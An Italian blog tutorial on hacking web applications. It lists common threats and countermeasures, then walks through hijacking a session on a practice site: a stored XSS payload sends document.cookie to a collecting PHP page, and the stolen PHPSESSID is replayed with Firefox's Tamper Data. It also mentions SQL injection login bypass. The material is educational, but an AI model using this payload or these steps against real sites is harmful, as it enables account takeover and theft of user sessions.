News.tecnologiche

"La scienza di oggi è la tecnologia di domani.”

Hacking

Come hackerare un sito Web: esempio di hacking di siti Web online

newstecnologiche

Più persone hanno accesso a Internet che mai. Ciò ha spinto molte organizzazioni a sviluppare applicazioni basate sul Web che gli utenti possono utilizzare online per interagire con l’organizzazione. Il codice scritto male per le applicazioni Web può essere sfruttato per ottenere l’accesso non autorizzato a dati sensibili e server Web.

In questo tutorial imparerai come hackerare i siti Web e ti presenteremo le tecniche di hacking delle applicazioni Web e le contromisure che puoi mettere in atto per proteggerti da tali attacchi .

Che cos’è un’applicazione web? Cosa sono le minacce Web?

Un’applicazione web (nota anche come sito web) è un’applicazione basata sul modello client-server. Il server fornisce l’accesso al database e la logica aziendale. È ospitato su un server web. L’applicazione client viene eseguita nel browser Web del client. Le applicazioni Web sono generalmente scritte in linguaggi come Java, C# e VB.Net, PHP, ColdFusion Markup Language, ecc. I motori di database utilizzati nelle applicazioni Web includono MySQL, MS SQL Server, PostgreSQL, SQLite, ecc.

La maggior parte delle applicazioni web è ospitata su server pubblici accessibili via Internet. Questo li rende vulnerabili agli attacchi grazie alla facile accessibilità. Le seguenti sono minacce comuni per le applicazioni Web.

  • SQL Injection : l’obiettivo di questa minaccia potrebbe essere quello di aggirare gli algoritmi di accesso, sabotare i dati, ecc.
  • Attacchi Denial of Service : l’obiettivo di questa minaccia potrebbe essere quello di negare agli utenti legittimi l’accesso alla risorsa
  • Cross Site Scripting XSS : l’obiettivo di questa minaccia potrebbe essere quello di iniettare codice che può essere eseguito sul browser lato client.
  • Avvelenamento da cookie/sessioni : l’obiettivo di questa minaccia è modificare i cookie/i dati di sessione da parte di un utente malintenzionato per ottenere un accesso non autorizzato.
  • Manomissione dei moduli : l’obiettivo di questa minaccia è modificare i dati dei moduli come i prezzi nelle applicazioni di e-commerce in modo che l’attaccante possa ottenere articoli a prezzi ridotti.
  • Iniezione di codice : l’obiettivo di questa minaccia è iniettare codice come PHP, Python, ecc. che può essere eseguito sul server. Il codice può installare backdoor, rivelare informazioni sensibili, ecc.
  • Defacement : l’obiettivo di questa minaccia è modificare la pagina visualizzata su un sito Web e reindirizzare tutte le richieste di pagina a una singola pagina che contiene il messaggio dell’attaccante.

Come proteggere il tuo sito Web dagli hack?

Un’organizzazione può adottare la seguente politica per proteggersi dagli attacchi del server web.

  • SQL Injection : la sanificazione e la convalida dei parametri utente prima di inviarli al database per l’elaborazione può aiutare a ridurre le possibilità di essere attaccati tramite SQL Injection . I motori di database come MS SQL Server, MySQL, ecc. supportano parametri e istruzioni preparate. Sono molto più sicuri delle tradizionali istruzioni SQL
  • Attacchi Denial of Service: i firewall possono essere utilizzati per eliminare il traffico da indirizzi IP sospetti se l’attacco è un semplice DoS. La corretta configurazione delle reti e del sistema di rilevamento delle intrusioni può anche aiutare a ridurre le possibilità che un attacco DoS abbia successo.
  • Cross Site Scripting: convalidare e disinfettare le intestazioni, i parametri passati tramite l’URL, i parametri del modulo e i valori nascosti può aiutare a ridurre gli attacchi XSS.
  • Cookie/Session Poisoning – questo può essere prevenuto crittografando il contenuto dei cookie, scadendo i cookie dopo un po’ di tempo, associando i cookie all’indirizzo IP del client che è stato utilizzato per crearli.
  • Temperamento del modulo: questo può essere prevenuto convalidando e verificando l’input dell’utente prima di elaborarlo.
  • Iniezione di codice: questo può essere prevenuto trattando tutti i parametri come dati anziché come codice eseguibile. La sanificazione e la convalida possono essere utilizzate per implementare questo.
  • Defacement: una buona politica di sicurezza per lo sviluppo di applicazioni Web dovrebbe garantire che sigilla le vulnerabilità comunemente utilizzate per accedere al server Web. Questa può essere una configurazione corretta del sistema operativo, del software del server Web e delle migliori pratiche di sicurezza durante lo sviluppo di applicazioni Web.

Trucchi per hackerare un sito Web: hackerare un sito Web online

In questo scenario pratico di hacking del sito Web, stiamo per dirottare la sessione utente dell’applicazione Web situata su www.techpanda.org . Utilizzeremo lo scripting cross-site per leggere l’ID di sessione del cookie, quindi lo utilizzeremo per impersonare una sessione utente legittima.

Il presupposto è che l’attaccante abbia accesso all’applicazione web e voglia dirottare le sessioni di altri utenti che utilizzano la stessa applicazione. L’obiettivo di questo attacco potrebbe essere quello di ottenere l’accesso come amministratore all’applicazione Web, supponendo che l’account di accesso dell’attaccante sia limitato.

Iniziare

  • Apri http://www.techpanda.org/
  • Per motivi pratici, si consiglia vivamente di ottenere l’accesso utilizzando SQL Injection. Fare riferimento a questo articolo per ulteriori informazioni su come farlo.
  • L’email di accesso è admin@google.com , la password è Password2010
  • Se hai effettuato l’accesso con successo, otterrai la seguente dashboard
Come hackerare un sito web
  • Fare clic su Aggiungi nuovo contatto
  • Inserisci quanto segue come nome

<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Scuro</a>

QUI,

Il codice sopra utilizza JavaScript . Aggiunge un collegamento ipertestuale con un evento onclick . Quando l’utente ignaro fa clic sul collegamento, l’evento recupera l’ ID di sessione del cookie PHP e lo invia alla pagina snatch_sess_id.php insieme all’ID di sessione nell’URL

Come hackerare un sito web
  • Inserisci i dettagli rimanenti come mostrato di seguito
  • Fare clic su Salva modifiche
Come hackerare un sito web
  • La tua dashboard ora apparirà come la seguente schermata
Come hackerare un sito web
  • Poiché il codice dello script cross site è memorizzato nel database, verrà caricato ogni volta che gli utenti con diritti di accesso accedono
  • Supponiamo che l’amministratore acceda e faccia clic sul collegamento ipertestuale che dice Dark
  • Otterrà la finestra con l’id di sessione mostrato nell’URL showing
Come hackerare un sito web

Nota : lo script potrebbe inviare il valore a un server remoto in cui è memorizzato il PHPSESSID, quindi l’utente è stato reindirizzato al sito Web come se nulla fosse.

Nota : il valore che ottieni potrebbe essere diverso da quello in questo tutorial sull’hacking di questa pagina web, ma il concetto è lo stesso

Furto d’identità della sessione utilizzando Firefox e il componente aggiuntivo Tamper Data

Il diagramma di flusso seguente mostra i passaggi da eseguire per completare questo esercizio.

Come hackerare un sito web
  • Avrai bisogno del browser web Firefox per questa sezione e del componente aggiuntivo Tamper Data
  • Apri Firefox e installa l’aggiunta come mostrato nei diagrammi seguenti
Come hackerare un sito web
Come hackerare un sito web
  • Cerca i dati di manomissione, quindi fai clic su Installa come mostrato sopra
Come hackerare un sito web
  • Fare clic su Accetta e installa…
Come hackerare un sito web
Come hackerare un sito web
  • Fare clic su Riavvia ora al termine dell’installazione
  • Abilita la barra dei menu in Firefox se non viene visualizzata
Come hackerare un sito web
  • Fare clic sul menu Strumenti, quindi selezionare Dati manomissione come mostrato di seguito
Come hackerare un sito web
  • Otterrai la seguente finestra. Nota: se Windows non è vuoto, premi il pulsante Cancella
Come hackerare un sito web
  • Fare clic sul menu Start Tamper
  • Torna al browser web Firefox, digita http://www.techpanda.org/dashboard.php quindi premi il tasto Invio per caricare la pagina
  • Otterrai il seguente pop-up da Tamper Data
Come hackerare un sito web
  • La finestra pop-up ha tre (3) opzioni. L’opzione Tamper consente di modificare le informazioni dell’intestazione HTTP prima che vengano inviate al server .
  • Cliccaci sopra
  • Otterrai la seguente finestra
Come hackerare un sito web
  • Copia l’ID sessione PHP che hai copiato dall’URL di attacco e incollalo dopo il segno di uguale. Il tuo valore dovrebbe ora assomigliare a questo

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

  • Fare clic sul pulsante OK
  • Otterrai di nuovo la finestra popup dei dati di manomissione
Come hackerare un sito web
  • Deselezionare la casella di controllo che chiede Continua manomissione?
  • Fai clic sul pulsante di invio quando hai finito
  • Dovresti essere in grado di vedere la dashboard come mostrato di seguito
Come hackerare un sito web

Nota : non abbiamo effettuato l’accesso, abbiamo impersonato una sessione di accesso utilizzando il valore PHPSESSID che abbiamo recuperato utilizzando lo scripting cross-site

Sommario

  • Un’applicazione web si basa sul modello server-client. Il lato client utilizza il browser Web per accedere alle risorse sul server.
  • Le applicazioni Web sono generalmente accessibili tramite Internet. Questo li rende vulnerabili agli attacchi.
  • Le minacce alle applicazioni Web includono SQL Injection, Code Injection, XSS, Defacement, Cookie poisoning, ecc.
  • Una buona politica di sicurezza durante lo sviluppo di applicazioni Web può contribuire a renderle sicure.
Posts created 107

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top
   

Apri un sito e guadagna con Altervista - Disclaimer - Segnala abuso - Notifiche Push - Privacy Policy - Personalizza tracciamento pubblicitario